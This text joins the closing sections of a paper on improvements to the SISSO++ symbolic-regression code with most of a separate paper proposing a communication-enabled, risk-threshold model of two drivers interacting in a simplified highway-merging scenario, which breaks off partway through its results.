function\(y=5.5+0.4158d_{1}-0.0974d_{2}+\delta\), where \(d_{1}=x_{0}^{2}\sqrt[3]{x_{1}}\), \(d_{2}=\left|x_{2}^{3}\right|\), and \(\delta\) is a Gaussian white noise term pulled from a distribution with a standard deviation of \(0.05\) in Fig. 7. For this problem the best one dimensional descriptor is \(\frac{1}{\sqrt[3]{x_{3}}}\), with \(x_{3}\) being explicitly set to \(\left(y+\Delta\right)^{-3}\) and \(\Delta\) is Gaussian white noise with a standard deviation of \(20.0\). This primary feature was Figure 6: An illustration of how tracking multiple residuals can improve the performance of SISSO. A three dimensional problem space (three training samples) defined by \(\mathbf{e_{1}}\), \(\mathbf{e_{2}}\), and \(\mathbf{e_{3}}\) with five feature vectors \(\mathbf{F_{1}}\) (gray), \(\mathbf{F_{2}}\) (blue), \(\mathbf{F_{3}}\) (red), \(\mathbf{F_{4}}\) (brown), and \(\mathbf{F_{5}}\) (turquoise) for a property vector, \(\mathbf{P}\) (purple). For this example the size of the SIS subspace, \(n_{sis}\), is two. The residuals for the best (\(\mathbf{\Delta_{1}}\), gray) and second best(\(\mathbf{\Delta_{2}}\), blue) one-dimensional models are shown as dashed lines. If the number of residuals, \(n_{res}\), is one, then only \(\mathbf{\Delta_{1}}\) is used (d, e) and \(\mathbf{F_{3}}\) will not be selected in the second SIS step. This means the best two dimensional model is not found. However, if \(n_{res}=2\) (b, c), then \(\mathbf{F_{3}}\) is selected and the best two dimensional model, a combination of \(\mathbf{F_{2}}\) and \(\mathbf{F_{3}}\), can be found in the second \(\ell_{0}\) step. explicitly added in order to ensure that the best one-dimensional model would not be either \(d_{1}\) or \(d_{2}\) in this synthetic problem. Because of this, when using a single residual the SIS subspace size has to be increased to over 400, before \(y\) can be reproduced by SISSO. However, by increasing the number of residuals to 50, SISSO can now find which features are most correlated to the residual of \(d_{1}\) and it immediately finds \(y\). In a recent paper we published, we further demonstrate this approaches effectiveness for learning models of the bulk modulus of cubic perovskites,[28]. ## IV Conclusions In this paper, we described recently developed improvements to the SISSO method and their implementation in SISSO++ code, both in terms of their mathematical and computational details, which constitute a large leap forwards in terms of the expressivity of the SISSO method. Utilizing these features provides greater flexibility and control over the expressions found by SISSO, and acts as a start to introducing "grammatical" rules into SISSO and symbolic regression. In particular, concepts such as the units and ranges of the formula could be extended to prune the search space of possible expressions for the final models. We have also described the implementation of _Parameter SISSO_, which considerably opens up the range of possible expressions found by SISSO. Finally, we discussed two improvements related to the SISSO solver, i.e., a linear programming implementation for the classification problems and the multiple-residuals technique, both providing extended flexibility in the descriptors and models found by SISSO. ## V Acknowledgements T.A.R.P. thanks Christian Carbogno for valuable discussions related to the parametric SISSO scheme and proof reading those parts of the manuscript. T.P. thanks Lucas Foppa for discussions related to the multi-residual approach and proof reading those parts of the manuscript. This work was funded by the NOMAD Center of Excellence (European Union's Horizon 2020 research and innovation program, grant agreement N\({}^{\text{o}}\) 951786), the ERC Advanced Grant TEC1p (European Research Council, grant agreement N\({}^{\text{o}}\) 740233), BigMax (the Max Planck Society's Research Network on Big-Data-Driven Materials-Science), and the project FAIR-mat (FAIR Data Infrastructure for Condensed-Matter Physics and the Chemical Physics of Solids, German Research Foundation, project N\({}^{\text{o}}\) 460197019). T.P. would like to thank the Alexander von Humboldt (AvH) Foundation for their support through the AvH Postdoctoral Fellowship Program. ## VI Conflict of interest statement The authors have no conflicts to disclose. ## VII Author contributions T.A.R.P. implemented all methods and performed all calculations. T.A.R.P. ideated all methods with assistance from LMG. MS and LMG supervised the project. All authors wrote the manuscript. ## VIII Data availability statement The data that support the findings of this study and all scripts used to generate the figures are openly available in FigShare at DOI: 10.6084/m9.figshare.22691857.
2304.06604
A model of communication-enabled traffic interactions
A major challenge for autonomous vehicles is handling interactive scenarios, such as highway merging, with human-driven vehicles. A better understanding of human interactive behaviour could help address this challenge. Such understanding could be obtained through modelling human behaviour. However, existing modelling approaches predominantly neglect communication between drivers and assume that some drivers in the interaction only respond to others, but do not actively influence them. Here we argue that addressing these two limitations is crucial for accurate modelling of interactions. We propose a new computational framework addressing these limitations. Similar to game-theoretic approaches, we model the interaction in an integral way rather than modelling an isolated driver who only responds to their environment. Contrary to game theory, our framework explicitly incorporates communication and bounded rationality. We demonstrate the model in a simplified merging scenario, illustrating that it generates plausible interactive behaviour (e.g., aggressive and conservative merging). Furthermore, human-like gap-keeping behaviour emerged in a car-following scenario directly from risk perception without the explicit implementation of time or distance gaps in the model's decision-making. These results suggest that our framework is a promising approach to interaction modelling that can support the development of interaction-aware autonomous vehicles.
O. Siebinga, A. Zgonnikov, D. A. Abbink
2023-04-13T15:15:32Z
http://arxiv.org/abs/2304.06604v1
# A model of communication-enabled traffic interactions ###### Abstract A major challenge for autonomous vehicles is handling interactive scenarios, such as highway merging, with human-driven vehicles. A better understanding of human interactive behaviour could help address this challenge. Such understanding could be obtained through modelling human behaviour. However, existing modelling approaches predominantly neglect communication between drivers and assume that some drivers in the interaction only respond to others, but do not actively influence them. Here we argue that addressing these two limitations is crucial for accurate modelling of interactions. We propose a new computational framework addressing these limitations. Similar to game-theoretic approaches, we model the interaction in an integral way rather than modelling an isolated driver who only responds to their environment. Contrary to game theory, our framework explicitly incorporates communication and bounded rationality. We demonstrate the model in a simplified merging scenario, illustrating that it generates plausible interactive behaviour (e.g., aggressive and conservative merging). Furthermore, human-like gap-keeping behaviour emerged in a car-following scenario directly from risk perception without the explicit implementation of time or distance gaps in the model's decision-making. These results suggest that our framework is a promising approach to interaction modelling that can support the development of interaction-aware autonomous vehicles. _Keywords--_ Driving Interactions, Driver Modelling, Traffic Communication ## 1 Introduction Autonomous vehicles (AVs) hold the potential to help address major societal challenges related to mobility and sustainability. However, one of the major open problems in autonomous vehicle development is safely and acceptably dealing with driving scenarios that require _two-way interaction_ with human road users. In these interactions, such as in highway merging or intersection negotiation, both vehicles reciprocally influence and respond to the actions of each other. It entails quick and sometimes iterative negotiations, based on communication (see e.g., [1, 2, 3]) that can either be implicit (vehicle motions) or explicit (e.g., honking, signalling). The continuous dynamics of a two-way interaction govern safety, priority (who goes first, who gives way), and acceptance (by passengers and other road users). For example, drivers can be misunderstood or cause annoyance by being too conservative or aggressive (interfering with, or ignoring others' communication). Therefore, fundamental knowledge about continuous human two-way interactions is necessary to develop and evaluate safe and acceptable AV behaviour for these scenarios. However, this fundamental knowledge about the dynamics of interactions is currently lacking. We advocate using a modelling approach for human two-way traffic interactions to develop the fundamental understanding that in the future can help design better AV behaviour. Modelling is a common way of gaining an understanding of human driving behaviour. But it has so far mostly been done with a focus on single-driver behaviour, either in single-vehicle (e.g., [4, 5]), or multi-vehicle scenarios such as car following [6, 7], lane changing [8, 9], and gap acceptance [10, 11]. Most multi-vehicle approaches assume that the modelled driver responds to other traffic participants, but that they don't respond in turn. For example, car-following models assume that the following driver responds to the leading vehicle, but this leading vehicle does not change its behaviour based on the follower's actions. We call this the _one-way interaction_ assumption. This assumption disentangles the behaviours of the multiple drivers and thereby enables the researchers to better understand and model the behaviour of the driver of interest. The scope of these models is thus deliberately restricted to a single driver. This one-way interaction assumption is justified for car-following models and the likes, but not for interactive driving scenarios like merging or intersection negotiations, which are inherently reciprocal. Simply joining two one-way interaction models to describe an interaction will neglect the drivers' beliefs about the other's future actions and their expected influence on it. Furthermore, it also neglects the presence and effects of communication between the drivers. Therefore, we argue that the scope of an interaction model should include all participants to begin with. The current mainstream approach to modelling complete traffic interactions (as opposed to individual drivers) is using game theory. Game theory was developed as a framework to describe two-way interactions between players in abstract games. It has been used extensively to model traffic interactions. The first model of human merging behaviour based on game theory was proposed in 1999 by Kita [12]. In 2007, Liu et al. improved the game theoretical approach by removing the assumption of constant velocity [13]. After that, many works followed (e.g. [14, 15, 16, 17]). However, applying game theory to model dynamics between two drivers is not trivial, because game theory makes three strong assumptions about these players. First, the assumption that all players rationally maximize some utility function. Empirical evidence has shown that even in simple economic games [18], but also in driving behaviour [19] and traffic interactions [20], this assumption does not hold for human players. Second, game theory does not allow communication between the players, an aspect known to be important in interactive driving scenarios [3]. Third, the majority of game-theory-based interaction models use a set of discrete actions for the drivers. Although this is useful to describe the higher-level tactical [21] decisions of drivers accurately (for example the decision to yield or merge), it does not describe the lower-level operational [21] dynamics of the interaction (e.g. changes in velocity or trajectory). Therefore, these approaches are not sufficiently detailed for developing safe and acceptable AV behaviour. Combined, these three limitations motivate the need for an alternative approach to modelling two-way traffic interactions that allows for communication, bounded rationality, and continuous dynamic actions. To address this gap, here we propose a framework for Communication-Enabled-Interaction (CEI) modelling. It can be used to create model implementations, of which we provide one example in a case study1. The modelling framework relaxes the common assumptions that drivers are rational agents and have full information about the strategies of other drivers. It is based on the notion that all drivers have a plan they want to execute and a belief about what other drivers are going to do. Combined, this plan and belief result in a perceived risk for every driver. The drivers are assumed to act to keep this risk below their individual threshold. The key insight of the framework is that the beliefs about others are updated based on communication between the agents. In a simulation case study, we show that an implementation of a CEI-model produces plausible behaviour of two interacting drivers in a simplified merging scenario. Besides that, human-like gap-keeping behaviour emerges directly from the notion of risk perception. These results show that the proposed modelling framework provides a promising new approach for modelling human-human driver interactions. Footnote 1: The software implementation of the presented model and its simulation environment are available online at [22]. The data discussed in the results section can be found at [23]. ## 2 Communication-Enabled Interaction (CEI) Modelling We propose a framework to model human-human traffic interactions between two drivers. This framework puts the modelling scope around the complete interaction rather than a single driver, and explicitly includes communication between the drivers. Each driver is described by four components: a notion of risk, a deterministic plan (for their own behaviour), a means of communication, and a probabilistic belief about the future actions of the other driver (Figure 1). The general framework we present here only defines loose requirements for these components. When implementing the model for a specific scenario or use case, these components can be designed based on existing literature (e.g., from the fields of human behaviour modelling, traffic communication, intent inference, or vehicle path planning). The advantage of this is that one can leverage knowledge from the literature to improve the model, without having to fully redesign it. In this section, we will discuss the four components and our reasoning behind them. The assumptions and requirements that need to be taken into account when implementing a model based on this framework will also be discussed per component. In Section 3, we will illustrate how each component can be implemented in an example implementation for a simplified merging scenario. ### Framework components #### Risk-Based Re-plan Recent research has shown that risk plays an important role in human driving behaviour [4, 24, 25]. In our framework, we combine this notion of risk-based decision making in driving with Simon's ideas of _bounded rationality_[26] and _satisficing_[27]. _Bounded rationality_ implies that humans are not capable of fully optimizing their behaviour all the time. _Satisficing_ (a portmanteau of _satisfy_ and _suffice_) is an example of bounded rationality in which humans are assumed to not continuously search for an optimal solution. Instead, they are _satisfied_ with a "good enough" solution that _suffices_. We reason that the only solutions that suffice and satisfy in a driving interaction are the ones that are _subjectively safe enough_. To formalize these ideas, and combine them in a framework, we hypothesize that drivers act to keep their perceived risk below their risk threshold. Using such a threshold incorporates Simon's ideas in two ways. First, it defines what solutions are subjectively safe enough. Second, it limits (or bounds) the cognitive capacities (or effort) required from the driver because it allows the driver to only rethink their plan when the situation changed and the current plan does not suffice or satisfy anymore. This is what we call a _risk-based re-plan_ (Figure 1). By incorporating these ideas, we step away from the fundamental assumption of game theory that humans are rational utility maximizers and move towards a formulation that allows Figure 1: An overview of the proposed Communication-Enabled-Interaction (CEI) modelling framework. This framework is designed to capture the two-way interaction between two drivers, rather than the one-way interaction behaviour of one driver with respect to another. Each driver has a _plan_ for their own behaviour. Plan updates are triggered based on a _risk threshold_ and a _risk estimate_ arising from a _belief_ of how the other driver will move over time. Each driver _communicates_ their plan (intention) either implicitly (e.g., through vehicle motion), or explicitly (e.g., through light signals) to the other driver. This communication links one driver’s plans to the belief of the other and can be divided into three components denoted _*A_, _*B_, and _*C_. _*A_ represents the mapping of a driver’s plan to its communication, _*B_ represents the means of communication, and _*C_ denotes the belief update of the other driver based on the received communication. for team effort and mutual goals. In summary, our framework assumes every driver to evaluate the risk of their current deterministic plan, given their probabilistic belief about what other drivers are planning to do. Risk perception can be based on a number of factors, such as high velocity, high acceleration, or the probability of a collision. This evaluation happens continuously, but drivers will only perform a re-plan if the perceived risk exceeds their threshold. This should result in drivers with a low risk threshold adapting their plan in an early stage of the interaction to reduce the estimated risk. At the same time, drivers with a high risk threshold will instead continue their current plan and take advantage of the fact that the risk of the situation is lowered by the other driver. Intuitively this can be explained as the driver with the higher risk threshold being more aggressive. ### Plan The second component in our framework is the _plan_. We assume that drivers have a deterministic plan about the actions they will take in the immediate future. In the framework, this plan takes the form of a deterministic set of waypoints over a limited time horizon. This time horizon should be long enough to include (part of) the interaction. The construction of this plan (i.e., the planning algorithm) should only consider features that are not related to risk and safety (e.g., desired velocity or comfort), as the perceived risk is constantly evaluated separately to determine if the current plan still suffices and satisfies. This evaluation is done taking into account both the plan and the belief. When re-planning, the risk threshold should be used as a constraint in the planning algorithm. As long as such a constraint can be imposed, the plan can be constructed using any suitable path-planning algorithm. ### Communication One of the key concepts of the framework is that drivers actively communicate their plan to other drivers. This assumption is based on field studies on human-human traffic interaction that confirm that traffic participants actively communicate their plan both explicitly and implicitly to others (e.g. [3]). Experiments on other (non-driving) tasks that require team effort have shown that humans use their movement actions to coordinate with their team member [28] (which is a form of implicit communication). The assumption of communication can also be effectively used to model human behaviour in those tasks [29]. Finally, in simulation, communication can be beneficial for controlling co-bots that navigate among humans [30], resulting in fewer dead-lock situations. In summary, previous research suggests that humans communicate in traffic and that the assumption of communication can be used both for the effective modelling of human teamwork behaviour and the effective control of robots. In the CEI modelling framework, communication links the plan of one driver to the belief of the other driver. In practice, this means that three aspects of communication need to be designed when implementing a CEI-model. First, one needs to determine the mode of communication; What signals are used to communicate? These signals can be explicit (e.g., turn indicators) or implicit (e.g., velocity, heading angle, or acceleration). Second, a mapping from a plan to its communication is required. This can be as simple as just executing the plan, but one could come up with more elaborate mappings based on traffic communication studies such as slowing down, purely to communicate that the other driver can go first (for an example of modelling such exaggerated trajectories in a bottle grasping task, see [29]). Finally, a mapping from communication to belief is needed, this mapping specifies how a probabilistic belief is updated based on the received communication. #### Belief Both drivers are assumed to have probabilistic beliefs about what the other driver will do in the near future. This belief consists of a number of points over a time horizon. Each of these belief points is represented by a probability distribution over positions for the other driver for that specific time in the future (Figure 1). This assumption is based on the intuition that human drivers have a general but uncertain idea about what other drivers are planning to do, a concept that has been successfully applied in other modelling frameworks such as belief-desire-intention programming (based on [31]) and (Bayesian) theory of mind [32] as well. When implementing the belief part of the CEI-model, the only requirement is that the chosen probability distribution can be updated using new information (coming from the observed communication). In practice, this means that most parametric probability distributions are suitable because they can be updated with methods such as Bayesian updates. ## 3 Case Study: an Example of an Implementation To demonstrate the feasibility of the proposed model framework and to investigate the effects of design choices (parameters) on model behaviour, we have implemented a CEI-model for a simplified merging scenario. In this case study, we show that even with simple components the model framework can produce plausible, human-like interactive behaviour. At the same time, it is not the purpose of this case study to quantitatively assess the model's consistency with human behaviour. Such an assessment using fine-grained data on the interactive behaviour of two drivers requires a detailed investigation and is therefore left for future work. ### Simplified merging scenario For this case study, we used a simplified symmetric merging scenario (Figure 2). In this scenario, two vehicles approach a merge point on a predefined track. The model can directly control the acceleration of the vehicles, but there is no steering involved. The vehicles have a rectangular bounding box for collision detection. The heading of the vehicles is pre-defined and always corresponds to the heading of the road. At the merge point, the heading of the vehicles changes instantly. The vehicles in the simplified scenarios are subject to a negative acceleration due to resistance and drag. The net acceleration (\(a^{net}\)) is the applied input (\(a^{in}\)) minus the negative acceleration \(a^{r}\) (a function of the vehicle's velocity \(v\)): \[a^{net}(v) =a^{in}-a^{r}(v),\,\text{where} \tag{1}\] \[a^{r}(v) =\alpha v^{2}+\beta. \tag{2}\] Parameters \(\alpha\) and \(\beta\) define the magnitude of the drag and constant resistance (\(\alpha=0.0005\) and \(\beta=0.1\)). Besides the resistance, the vehicles have a maximum acceleration \(a^{max}=2.5\ \frac{m}{s^{2}}\), which is the same for positive and negative accelerations. The velocity of the vehicles is restricted to non-negative values. The simulation updates all dynamics at a rate of \(20\ Hz\). ### Plan The planning part of the model consists of a path planning algorithm that minimizes the following cost function: \[c=\sum^{N}(v_{n}-v^{d})^{2}+(a_{n}^{in})^{2}. \tag{3}\] Where \(n\) denotes the time-step and \(v\) the vehicle's velocity. This cost function includes terms for minimizing the squared input \(a^{in}\) and for travelling at a desired velocity \(v^{d}\). The path is planned at the same frequency as the simulation (\(20\ Hz\)) and is subject to a time horizon of \(4\ s\) (\(N=\frac{4}{0.05}=80\)). A visual example of the plan, belief, and risk perception is shown in Figure 3. When initially planning the path, the cost function of Equation 3 is minimized, so an optimal path is found with respect to comfort and speed (Figure 3-A). If, at the next time step, the current plan still satisfies (i.e., the risk threshold is not exceeded), the current plan is continued. We assume that maintaining velocity at the final time step is the practical equivalent of maintaining the current plan. When the risk threshold is exceeded, the cost function is minimized again to find a new plan (Figure 3-C). This time the minimization is subject to a risk constraint. Based on the ideas of satisficing, we hypothesise that humans do not spend unlimited effort to find an optimal plan, but instead search for a new solution that satisfies and suffices. We hypothesize that re-planning is easiest (i.e., requ Figure 2: A top-down view of the simplified merging scenario as used in the case study, rotated 90 degrees clockwise. Vehicles follow pre-defined paths (road centres) that merge at a pre-defined merge point. Vehicles have a two-dimensional body (\(4.5\ m\) x \(1.8\ m\)) and their headings change instantly at the merge point. The model controls the accelerations of the vehicles directly. The dimensions of the track are defined by two parameters. Distance \(l_{a}\) (\(25\ m\)) denotes the distance between the start points of the vehicles. Distance \(l_{b}\) (\(50\ m\)) is the distance to travel from the start point until the merge point, and from the merge point until the end of the track. effort) if the new plan is close to the previous plan (i.e., uses the same strategy). Therefore, the re-planning optimization is executed with the old plan as the initial condition. When using a gradient descent algorithm, this will result in a solution that is close to the previous plan while the risk constraint is met. For example, if the current plan is to decelerate and pass behind the other driver, the most likely outcome of the re-planning will be to decelerate even more and increase the gap. This will lower the perceived risk while using the current strategy. If the optimization with the current plan as the initial condition does not succeed, three other initial conditions are considered: full braking at all time steps, no acceleration input at all time steps, and full acceleration at all time steps. The candidate plan with the lowest cost is used as the initial condition for a second re-plan. This can result in a change of strategy, but only if the current strategy is not feasible anymore. For example, when the driver was decelerating but decelerating even more will not reduce the risk enough, it will investigate if acceleration will reduce the risk and change its strategy if needed. ### Belief The belief is kept as a sequence of probability distributions over positions for the other vehicle, each at a specific point in time (Figure 3-A). This sequence of belief points uses the same time horizon as the planning part of the model (\(4\)\(s\)) but contains fewer points for simplicity. Belief points are kept at a \(4\)\(Hz\) frequency (this number was based on an initial evaluation of the model), resulting in a sequence of \(4\cdot 4=16\) points. Each belief point is represented by a Gaussian distribution. The Gaussian distributions are initialized by combining the initial velocity and position of the other vehicle with the maximum bounds of acceleration. To initialize a belief point, the mean of the Gaussian is set to the position that corresponds to the other driver maintaining its current velocity. To calculate the standard deviation, an upper and lower position bound (\(ub\) and \(lb\)) are used. These are calculated by predicting the position of the other vehicle if it would apply the maximum and minimum possible acceleration continuously. The standard deviation is then calculated as the difference between the bounds and the mean divided by 3 (\(\sigma=\frac{ub-\mu}{3}\)). The factor \(\frac{1}{3}\) is based on the fact that \(99.73\%\) of the area under a normal distribution corresponds to \(\mu+/-3\sigma\). Once the simulation time is equal to the timestamp corresponding to the first belief point, this point is removed from the sequence and a new point is initialized. ### Communication Human communication during driving is a complex topic on which a lot of research has been done. Thus, there is much potential for including complex communication models based on empirical evidence in a CEI-model. However, for this initial investigation of the modelling framework, we used a simple implicit communication model that does not include any explicit communication signals (e.g., turn indicators). We only use velocity and position as communication signals. These two values are assumed to be constantly observed by the other driver without any errors or noise. When sending communication, the drivers do not use a mapping from their current plan to the actions they take. Instead, they just take the next action from their plan. When receiving communication, drivers use a constant velocity model combined with Figure 3: An example to illustrate the plan and the belief of the model. a) shows four (of 80) deterministic plan points along the one-dimensional track. These are the planned centre positions of the own vehicle at four points in time. The distributions represent the believed centre position of the other vehicle at the same four (of 16) points in time, where colours denote the points in time. b) shows these plan and belief points after a single belief update. This update increased the certainty of the belief about the other vehicle’s position. The belief is updated at every time step. c) shows the risk evaluation for one of the points. To evaluate the risk, the probability of a collision (\(p_{c}\)) is evaluated by calculating the probability that the other vehicle will be within the bounds of collision for the given planned position. This risk evaluation is done at every time step for all belief points. If the maximum perceived risk value exceeds the upper risk threshold, a re-plan is triggered. This re-plan uses the perceived risk as a constraint for the optimization. To lower the risk, the planned position could be moved in the direction of the black arrow. bounds of comfortable acceleration to update their belief. All belief points are updated every time step using Bayesian updating. #### 3.4.1 Updating the Belief For Bayesian updating, the previous belief point serves as the prior distribution, and the resulting posterior is adopted as the updated belief point (Figure 3-B). The likelihood is constructed using the constant-velocity model. We assume the likelihood to be a Gaussian distribution where the standard deviation is constant and known. This means the likelihood and prior form a conjugate pair, meaning that the posterior will also be a Gaussian distribution of which the \(\mu\) and \(\sigma^{2}\) have a closed-form solution. The likelihood function for the belief point at time \(t\) is defined as follows: \[\mathcal{N}\left(\mu=\frac{p}{t},\sigma^{2}=\left(\frac{a_{c}t}{6}\right)^{2}\right) \tag{4}\] In this equation, \(p\) denotes a position sampled from the prior (the previous belief point), \(t\) denotes the time corresponding to the belief point, and \(a_{c}\) is the maximum comfortable acceleration (\(a_{c}=1.0\ \frac{m}{s}\)). The same value is used for positive and negative accelerations, thus the distribution is symmetrical. The likelihood function describes the probability of observing a velocity \(v\) (now) given a sampled predicted position \(p\) (at time \(t\)) from the prior belief. The mean \(\mu\) corresponds to constant velocity, and \(\sigma\) is determined based on the assumption that \(99.73\%\) of the distribution falls within the bounds of comfortable acceleration. With this likelihood function, the posterior has a closed form solution. We denote the prior as \(\mathcal{N}(\mu_{0},\sigma_{0}^{2})\) and the posterior as \(\mathcal{N}(\mu_{1},\sigma_{1}^{2})\). When updating with a single data point \(v\), the solution for the posterior becomes2: Footnote 2: For a complete derivation of this closed-form solution, see the supplementary material. \[\mu_{1} =\frac{\mu_{0}\sigma^{2}+v\sigma^{2}\frac{1}{t}}{\sigma^{2}+ \sigma_{0}^{2}\frac{1}{t^{2}}} \tag{5}\] \[\sigma_{1}^{2} =\frac{\sigma^{2}\sigma_{0}^{2}}{\sigma^{2}+\sigma_{0}^{2}\frac{ 1}{t^{2}}} \tag{6}\] ### Risk The risk perceived by the drivers is assumed to be proportional to the probability of a collision. Other aspects (i.e., high velocity and high acceleration) are assumed not to contribute to the perceived risk for simplicity. To estimate the probability of a collision, we define the concept of _bounds of collision_ (Figure 3-C). These are the extreme positions of the other vehicle that would result in a collision, given the position of the own vehicle. These bounds are calculated for every point in the driver's plan. For example, if we know the driver will be at position \(x\) at time \(t\), we can use the vehicles' dimensions to calculate that a collision will occur if and only if the other vehicle is at a position between \(x+c_{1}\) and \(x-c_{2}\) at the same time; these are the bounds of collision. The believed probability that the other vehicle will be within these bounds at that time can be calculated using the belief about the other vehicle's position. This probability is then equal to the probability of a collision at that time. The perceived risk for a complete plan is determined by taking the maximum risk over all belief points. A re-plan is triggered if the perceived risk exceeds an upper threshold \(\rho_{u}\). Only using the upper threshold, however, poses a potential problem when the merging conflict is resolved because after that there will be no triggers to re-plan anymore. This might cause vehicles to stall or drive very slowly for no reason. We avoid this by extending the risk module with a lower risk threshold \(\rho_{l}\) and a saturation time \(\tau\). If the perceived risk is lower than \(\rho_{l}\) and the last update was longer than \(\tau\) ago, a re-plan is also triggered. When a re-plan optimization is performed, the perceived risk is constrained to be lower than the average of the two thresholds. For the implementation of this constraint, the instant heading change at the merge point in the track posed a problem. Therefore, a linear approximation of the bounds of collision is used. ### Investigated Scenarios In total, every driver in the model has four parameters that determine their behaviour: a desired velocity \(v_{d}\), an upper risk threshold \(\rho_{u}\), a lower risk threshold \(\rho_{l}\), and a saturation time \(\tau\). Besides these parameters, the initial velocity and position (\(v_{0}\) and \(x_{0}\)) of the drivers can also be adjusted. Both drivers always start from the beginning of the track. In the case study, we investigate the effect of these parameters and the effect of differences in the initial condition in four scenarios (Table 1). The first two scenarios (A & B) manipulate the initial and desired velocity of the right driver while keeping the parameters of the left driver fixed; the drivers here have the same risk thresholds. In scenario A, the drivers are not expected to be on a collision course if they would stick to their desired velocity, but in scenario B, they are. Scenarios C & D focus on the risk thresholds. Scenario C investigates the effect of a difference in risk thresholds between drivers. Scenario D investigates the sensitivity of model behaviour to variations of these thresholds in one of the drivers. The saturation time \(\tau\) only affects the behaviour after the conflict is resolved, therefore it is kept constant at 2.0 \(s\) for all scenarios. \begin{table} \begin{tabular}{|c|c c|c c c|c|} \cline{2-7} \multicolumn{1}{c|}{} & Side & \(\rho_{l}\) & \(\rho_{u}\) & \(v_{0}\) & \(v_{d}\) & \(x_{0}\) \\ \hline Units & - & - & - & \(\frac{m}{s}\) & \(\frac{m}{s}\) & \(m\) \\ \hline Condition A: & left & 0.2 & 0.5 & 10.0 & 10.0 & 0.0 \\ No expected collision & right & 0.2 & 0.5 & **9.0** & **9.0** & 0.0 \\ \hline Condition B: & left & 0.2 & 0.5 & 10.0 & 10.0 & 0.0 \\ On a collision course & right & 0.2 & 0.5 & **9.0** & **9.0** & **1.2** \\ \hline Condition C: & left & 0.2 & **0.4** & 10.0 & 10.0 & 0.0 \\ High and low thresholds & right & **0.3** & **0.6** & 10.0 & 10.0 & 0.0 \\ \hline Condition D: & left & **0.3** & **0.4** & 10.0 & 10.0 & 0.0 \\ Threshold sensitivity & right & **0.3** & **0.6** & 10.0 & 10.0 & 0.0 \\ \hline \end{tabular} \end{table} Table 1: Parameters of the investigated scenarios. Underlined values denote deviations from the default values. \(\rho_{l}\) and \(\rho_{u}\) denote the lower and upper risk thresholds. \(v_{0}\) and \(v_{d}\) are the initial and desired velocity respectively. \(x_{0}\) denotes the initial position of the vehicle along the track. ## 4 Results ### Scenario A: No expected collision Scenario A serves as a baseline scenario. Here, both drivers have an initial velocity that is equal to their desired velocity, but that differs from the velocity of the other driver (Table 1). If they would keep their initial (desired) velocity up until the merge Figure 4: Model behaviour in scenario A (no expected collision). Line colours correspond to the vehicle colours in Figure 2. a) Positions of the left and right vehicles over time. The x positions of the vehicles are plotted with an offset to prevent the lines from overlapping after the merge point. The grey dots and dashed lines indicate vehicle positions at equal time stamps with an interval of 1.0 \(s\). b) Velocities of the vehicles over time. The stars indicate the moment when the simulated driver performed a re-plan because the upper risk threshold was exceeded, and a circle denotes a re-plan because the risk fell below the lower threshold. These re-plans are only triggered if the last re-plan was longer than \(\tau\) ago. c) Accelerations of the vehicles over time. d) Perceived risk of both simulated drivers. In case of a re-plan, the perceived risk after the re-plan is shown. The dashed horizontal lines in the lowest plots indicate the risk thresholds of the drivers. In this scenario, the drivers increased the small projected gap, even though they were initially not on a collision course. The simulated drivers behaved in a way to increase the initially narrow safety margin. point, no collision would occur. The left driver would pass the merge point first with a small distance gap of 0.2 \(m\). Therefore we would expect a rational optimizing model (that does not explicitly include human-like gap-keeping) to maintain the desired velocity all the way. A behaviour expected from human drivers, on the other hand, is to increase this small safety margin. In an empirical study [33], it was found that human drivers in the Netherlands merged on three different highway locations with mean headways of 12.6, 13.4, & 36.1 \(m\) for velocities below 60 \(km/h\) = 16.7 \(m/s\), and standard deviations of respectively 10.3, 12.8 & 18.2 (the headway is defined as the gap plus the leading vehicle length). In the modelled outcome of scenario A (Figure 4), the left driver reached the merge point first. They accelerated slightly to increase the safety margin at the merge point, after that, they returned to their preferred velocity. The headway when the second vehicle reached the merge point was 6.4 \(m\). This corresponds to the expected human behaviour, and can not be modelled with utility-maximization unless utility is explicitly awarded for keeping a gap. The right driver did not take any action in this scenario. The reason for that is highlighted in the risk perception plot. The left driver's risk increases earlier because it expects to reach the merge point earlier. This increase causes the left driver to take action to lower the risk, while the right driver can continue their plan without exceeding their risk threshold. The right driver's perceived risk also decreases as soon as the left driver takes action; they perceive that the conflict was resolved by the left driver. ### Scenario B: On a collision course In scenario B, the drivers have the same desired and initial velocities as in scenario A. However, the right vehicle starts with a 1.2 \(m\) head-start. Therefore, the projected positions of the two vehicles at the merge point overlap by 1.0 \(m\). Thus, if neither driver deviates from their desired velocity, this scenario will result in a collision. We would therefore expect that this scenario requires more severe action to be resolved than scenario A, but we do expect the model to avoid a collision. The modelled outcome of scenario B (Figure 5) shows that this scenario indeed requires more effort from both drivers to resolve the conflict compared to scenario A. Both drivers start braking until the left driver decides they can only reduce the risk of a collision by accelerating. This can be explained by the fact that the left driver has a slightly higher velocity at this point compared to the right driver. The right driver sticks to their plan and keeps decelerating until the risk drops below the lower threshold and the saturation time has passed, only then they accelerate again. This behaviour results in a safety margin between the vehicles that is not explicitly included in the reward function. Because the left driver is the first to accelerate, they reach the merge point first. This explainable interactive behaviour combined with the collision-free outcome can be regarded as a plausible human-like interaction. ### Summary Scenarios A and B In scenario A, the driver with the higher preferred velocity that approached the merge point first also passed the merge point first. But the distance gap between the vehicle was enlarged by the drivers. This corresponds to what we expected from human drivers. If the drivers approach the merge point with an expected collision (scenario B), however, the drivers take more drastic action but still manage to resolve the conflict by interacting with each other. ### Scenario C: High and low thresholds Scenario C represents a case where the simulated drivers of both vehicles have the same initial conditions and desired velocities, but different risk thresholds. Compared to the previous scenarios, the right driver has higher risk thresholds while the left driver has lower thresholds. The left driver, having lower thresholds, is expected to act early in the interaction to reduce their perceived risk. In terms of human behaviour, this would correspond to risk-averse, conservative driving. The right driver (high thresholds meaning higher tolerance to risk) is expected to react to a potential conflict at a later point and therefore to keep their velocity at the desired level longer. We expect that the right driver reaches the merge point first, and deviates less from their desired velocity compared to the left driver. The modelled outcome of scenario C (Figure 6) is as expected: the left driver reached their upper threshold first and started to decelerate to reduce the perceived risk. In terms of human driving, this can be seen as more conservative behaviour. The right driver reacts later because their risk threshold is exceeded at a later moment. They briefly decelerate, but quickly start to accelerate to reduce the risk since the left driver already decelerated. This results in the right driver reaching the merge point first and deviating less from their desired velocity than the left driver. This Figure 5: Model behaviour in scenario B. The simulated drivers prevent a collision by slowing down. Initially, they both slow down, but after approximately one second, the left (initially faster) driver speeds up and reaches the merge point first. For details of the notation, see the caption of Figure 4. corresponds to the intuition that lower sensitivity to risk 